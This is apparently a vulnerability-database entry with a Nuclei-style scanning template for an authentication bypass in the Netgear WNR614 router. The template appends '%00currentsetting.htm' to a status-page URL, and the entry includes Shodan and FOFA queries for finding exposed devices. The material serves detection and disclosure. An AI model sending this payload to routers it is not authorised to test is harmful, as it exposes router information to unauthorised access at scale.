漏洞描述
A vulnerability in the Netgear WNR614 router permits unauthorized individuals to bypass the authentication. When adding "%00currentsetting.htm" to the the requested url, it will be recognized as passing the authentication.
netgear-wnr614-auth-bypass: Netgear WNR614 - Improper Authentication
PoC代码[已公开]
id: netgear-wnr614-auth-bypass
info:
name: Netgear WNR614 - Improper Authentication
author: ritikchaddha
severity: high
description: |
A vulnerability in the Netgear WNR614 router permits unauthorized individuals to bypass the authentication. When adding "%00currentsetting.htm" to the the requested url, it will be recognized as passing the authentication.
reference:
- https://github.com/Shuanunio/CVE_Requests/blob/main/Netgear/WNR614/assets/image-20241210153405727.png
- https://github.com/Shuanunio/CVE_Requests/blob/main/Netgear/WNR614/ACL%20bypass%20Vulnerability%20in%20Netgear%20WNR614.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
vendor: Netgear
product: WNR614
shodan-query: http.title:"WNR614"
fofa-query: title="NETGEAR WNR614"
tags: cve,cve2024,netgear,router,exposure,wnr614,unauth,vuln
http:
- method: GET
path:
- "{{BaseURL}}/RST_status.htm%00currentsetting.htm"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Router Information", "Show Statistics", "Internet Port")'
- 'status_code == 200'
condition: and
# digest: 4b0a004830460221009aa86080592e79716bffc2f02322e81978dcc6e57423e96e1669c41f5302355e0221008199e369c140f1a4acec96794050daa2efd7964198855deec2b31a60f351c214:922c64590222798bb761d5b6d8e72950